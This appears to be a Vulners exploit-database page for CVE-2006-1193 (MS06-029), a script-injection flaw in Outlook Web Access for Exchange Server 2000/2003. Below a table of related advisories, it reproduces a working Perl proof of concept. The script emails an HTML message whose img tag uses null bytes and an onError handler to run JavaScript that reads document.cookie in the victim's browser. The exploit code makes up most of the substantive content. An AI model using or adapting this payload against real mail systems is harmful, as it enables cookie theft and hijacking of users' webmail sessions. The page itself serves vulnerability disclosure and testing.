Microsoft Exchange Server 2000/2003 - Outlook Web Access Script Injection
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| Microsoft Exchange Server Outlook Web Access Script Injection (MS06-029; CVE-2006-1193) | 28 Oct 200900:00 | – | checkpoint_advisories | |
| CVE-2006-1193 | 13 Jun 200619:00 | – | cve | |
| CVE-2006-1193 | 13 Jun 200619:00 | – | cvelist | |
| CVE-2006-1193 | 13 Jun 200619:06 | – | nvd | |
| Cross site scripting | 13 Jun 200619:06 | – | prion | |
| Microsoft Security Bulletin MS06-029 Vulnerability in Microsoft Exchange Server Running Outlook Web Access Could Allow Script Injection (912442) | 13 Jun 200600:00 | – | securityvulns | |
| MS06-029: Vulnerability in Microsoft Exchange Server Running Outlook Web Access Could Allow Script Injection (912442) | 13 Jun 200600:00 | – | nessus | |
| Microsoft Outlook Web Access for Exchange Server script injection vulnerability | 13 Jun 200600:00 | – | cert |
source: https://www.securityfocus.com/bid/18381/info
Microsoft Exchange Server Outlook Web Access is prone to a script-injection vulnerability.
A remote attacker can exploit this issue by sending a malicious email message to a vulnerable user.
#!/usr/bin/perl
use Net::SMTP;
my $to = "recipient\@domain.tld";
my $sub = "Watch out - Cross Site Scripting Attack";
my $from = "originator\@domain2.tld";
my $smtp = "mail.example.tld";
my $cont = "<img alt='hugo\0abc' src='http://www.example.com/
imagethatdoesnotexist.gif' onError='javascript:alert(document.cookie)'
alt='<s'\0";
$smtp = Net::SMTP->new($smtp);
$smtp->mail("$from") || die("error 1");
$smtp->to("$to") || die("error 2");
$smtp->data() ;
$smtp->datasend("To: $to\n") ;
$smtp->datasend("From: $from\n") ;
$smtp->datasend("Subject: $sub\n");
$smtp->datasend("Content-Type: text/html\n\n");
$smtp->datasend("$cont") ;
$smtp->datasend("\n\n") ;
$smtp->dataend() ;
$smtp->quit() ;
print "$cont\n\ndone\n";Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.6
EPSS0.39173